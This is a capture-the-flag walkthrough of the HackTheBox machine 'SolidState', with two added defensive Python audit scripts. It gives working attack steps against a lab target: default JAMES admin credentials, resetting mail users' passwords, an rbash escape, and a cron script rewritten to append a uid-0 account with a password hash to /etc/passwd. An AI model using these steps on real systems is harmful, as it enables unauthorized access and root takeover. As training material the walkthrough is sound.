SolidState

tags: HTB Medium Linux OSCP
Platform: Hackthebox
Difficulty: Medium
OS: Linux

Enumeration

Nmap

To get started, we run a quick scan of all TCP ports.

# nmap -p- -T4 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:35 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Nmap done: 1 IP address (1 host up) scanned in 76.06 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 22,25,80,110,119,4555 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:39 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.7 [10.10.14.7]), 
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   92.98 ms 10.10.14.1
2   93.12 ms 10.10.10.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.34 seconds

JAMES Remote Admin

A quick search shows that the default credentials for JAMES Remote Admin are root:root, and they still work here!

# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

Let's see what users there are.

listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Exploitation

Well, we are going to reset all of their passwords and read their emails.

setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin reset

Let's add the accounts to Thunderbird.

As we can see, John has a message in his inbox.

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

And mindy has two messages.

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James

In this one, we find credentials!

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: [email protected][email protected]

Respectfully,
James

We are going to connect by SSH with these credentials.

# ssh mindy@10.10.10.51
mindy@10.10.10.51's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
............................................................................
............................................................................
-rbash: $'\r': command not found
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ /bin/sh
-rbash: /bin/sh: restricted: cannot specify `/' in command names
mindy@solidstate:~$

Okay... we are jailed... Well let's get away 🤷🏻‍♂️

Jail escape

Running compgen -c shows which commands are available to us.

We can execute cat, so let's grab the user flag!

mindy@solidstate:~$ cat user.txt
CENSORED_FLAG

Trying to escape by asking SSH to run bash directly (-t "bash") instead of the restricted login shell... Done!

# ssh mindy@10.10.10.51 -t "bash"
mindy@10.10.10.51's password: 
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$

Post exploitation

Enumeration

Pspy

Running pspy, we see a process started as root (UID=0) that runs a Python script from /opt:

2021/03/23 15:54:01 CMD: UID=0    PID=14955  | /bin/sh -c python /opt/tmp.py

Wow! The script is world-writable, so we can edit it! We are going to inject a user with root privileges into /etc/passwd.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py
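Before moving on, here is how a defender could have caught this. The following Python is an added example (not from the write-up or from any tool used here): it takes root-executed command lines, such as crontab entries or pspy's CMD: output, finds the script each one runs and reports any that a non-root user could modify. The function names, the temp-dir demo and its pspy-style lines are all constructed for the example.

```python
"""Added example, not part of the original write-up: audit commands that run
as root (crontab entries, pspy output) for scripts writable by unprivileged
users, the weakness behind the -rwxrwxrwx /opt/tmp.py above.
The pspy-style command lines in demo() are constructed for the demo."""
import os
import stat
import tempfile
from typing import Callable, List, NamedTuple, Optional

# Interpreters to skip when looking for the script a command line actually runs
INTERPRETERS = ("sh", "bash", "dash", "python", "perl")


class Finding(NamedTuple):
    path: str
    mode: str        # as ls -l prints it, e.g. "-rwxrwxrwx"
    owner_uid: int
    reason: str


def _is_interpreter(path: str) -> bool:
    base = os.path.basename(path)
    return any(base == name or base.startswith(name) for name in INTERPRETERS)


def first_script_path(cmdline: str) -> Optional[str]:
    """Return the first absolute path that is not an interpreter, so that
    '/bin/sh -c python /opt/tmp.py' yields '/opt/tmp.py'."""
    for token in cmdline.split():
        if token.startswith("/") and not _is_interpreter(token):
            return token
    return None


def audit_root_commands(cmdlines: List[str],
                        stat_fn: Callable[[str], os.stat_result] = os.stat,
                        expected_owner: int = 0) -> List[Finding]:
    """Flag scripts that someone other than expected_owner (root by default)
    could modify: world-writable, writable by a non-root group, or owned by
    another user. Missing files are skipped."""
    findings: List[Finding] = []
    for line in cmdlines:
        path = first_script_path(line)
        if path is None:
            continue
        try:
            st = stat_fn(path)
        except FileNotFoundError:
            continue
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            reasons.append("writable by non-root group %d" % st.st_gid)
        if st.st_uid != expected_owner:
            reasons.append("owned by uid %d, not %d" % (st.st_uid, expected_owner))
        if reasons:
            findings.append(Finding(path, stat.filemode(st.st_mode),
                                    st.st_uid, "; ".join(reasons)))
    return findings


def demo() -> List[Finding]:
    """Constructed scenario: two scripts in a temp dir, one with the 0777 mode
    seen on /opt/tmp.py and one with a sane 0755 mode. This runs unprivileged,
    so the current user stands in for root as the expected owner."""
    tmp = tempfile.mkdtemp()
    loose = os.path.join(tmp, "tmp.py")
    tight = os.path.join(tmp, "backup.sh")
    for p in (loose, tight):
        with open(p, "w") as f:
            f.write("#!/usr/bin/env python\n")
    os.chmod(loose, 0o777)
    os.chmod(tight, 0o755)
    cmdlines = [  # constructed, in the style of pspy's CMD: output
        "/bin/sh -c python %s" % loose,
        "/bin/sh -c %s" % tight,
        "/bin/sh -c python /opt/does-not-exist.py",
    ]
    return audit_root_commands(cmdlines, expected_owner=os.getuid())


if __name__ == "__main__":
    for f in demo():
        print("%s %s uid=%d: %s" % (f.mode, f.path, f.owner_uid, f.reason))
```

Only the 0777 script is reported; the 0755 one is silent and the missing path is skipped. Run against real crontab lines with the default expected_owner of 0, the same check would have flagged /opt/tmp.py the day it was created.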

Privilege escalation

Okay, let's add our code to the script.

#!/usr/bin/env python
import os
import sys

# Append our uid-0 account once, then let the rest of the script run as before.
with open('/etc/passwd', 'r') as f:
    passwd = f.readlines()

if not any('x4v1l0k' in s for s in passwd):
    with open('/etc/passwd', 'a') as output:
        # trailing newline so the entry is a complete line
        output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash\n')

try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()

At the next run, pspy shows the modified script being executed as root:

2021/03/23 16:06:01 CMD: UID=0    PID=932    | /bin/sh -c python /opt/tmp.py
2021/03/23 16:06:01 CMD: UID=0    PID=933    | python /opt/tmp.py

Perfect, the script has run. Let's check that the user was injected and, if so, authenticate as it.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /etc/passwd | tail -n 1
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ su x4v1l0k
Password: 
root@solidstate:/home/mindy# id
uid=0(root) gid=0(root) groups=0(root)
root@solidstate:/home/mindy# cat /root/root.txt
CENSORED_FLAG
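The counterpart on the detection side, as an added example that is not part of the original write-up: a small /etc/passwd audit that flags exactly what the injected entry does wrong (a second uid-0 account, and a hash in the password field rather than an 'x' pointing to /etc/shadow), plus a baseline comparison of the kind a file-integrity monitor performs. The baseline entries, including mindy's shell and empty GECOS field, are constructed; the final line of SAMPLE_PASSWD is the entry from the write-up.

```python
"""Added example, not part of the original write-up: spot the /etc/passwd
tampering performed above. A legitimate file has exactly one uid-0 entry
(root) and an 'x' in the password field, so the hash lives in /etc/shadow;
the injected line breaks both rules. BASELINE_PASSWD is constructed for the
demo; SAMPLE_PASSWD adds the entry appended by the modified cron script."""
from typing import List, NamedTuple

# Password-field values that mean "no hash stored here"
SHADOWED_OR_LOCKED = ("x", "*", "!", "!!")


class PasswdIssue(NamedTuple):
    line_no: int
    user: str
    issue: str


def audit_passwd(text: str) -> List[PasswdIssue]:
    """Return one issue per suspicious property of each /etc/passwd entry."""
    issues: List[PasswdIssue] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            issues.append(PasswdIssue(n, fields[0],
                                      "malformed entry (%d fields, expected 7)" % len(fields)))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and user != "root":
            issues.append(PasswdIssue(n, user, "uid 0 account other than root"))
        if pw == "":
            issues.append(PasswdIssue(n, user, "empty password field (no password required)"))
        elif pw not in SHADOWED_OR_LOCKED:
            issues.append(PasswdIssue(n, user,
                                      "password hash stored in /etc/passwd instead of /etc/shadow"))
    return issues


def new_users(baseline: str, current: str) -> List[str]:
    """Users present in current but not in baseline: the check a file-integrity
    monitor would make after each run of a root cron job."""
    def users(text: str) -> List[str]:
        return [l.split(":")[0] for l in text.splitlines()
                if l.strip() and not l.startswith("#")]
    known = set(users(baseline))
    return [u for u in users(current) if u not in known]


# Constructed baseline; the last line of SAMPLE_PASSWD is the entry from the write-up.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mindy:x:1001:1001::/home/mindy:/bin/rbash
"""
SAMPLE_PASSWD = BASELINE_PASSWD + "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash\n"


if __name__ == "__main__":
    for issue in audit_passwd(SAMPLE_PASSWD):
        print("line %d user %s: %s" % (issue.line_no, issue.user, issue.issue))
    print("new users since baseline:", new_users(BASELINE_PASSWD, SAMPLE_PASSWD))
```

The baseline produces no issues; the tampered file yields two findings on line 4, both for x4v1l0k, and the baseline diff names the same account. Either check, run from a host-monitoring agent after each cron cycle, would have raised an alert within minutes of the script's first run.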

That's all folks!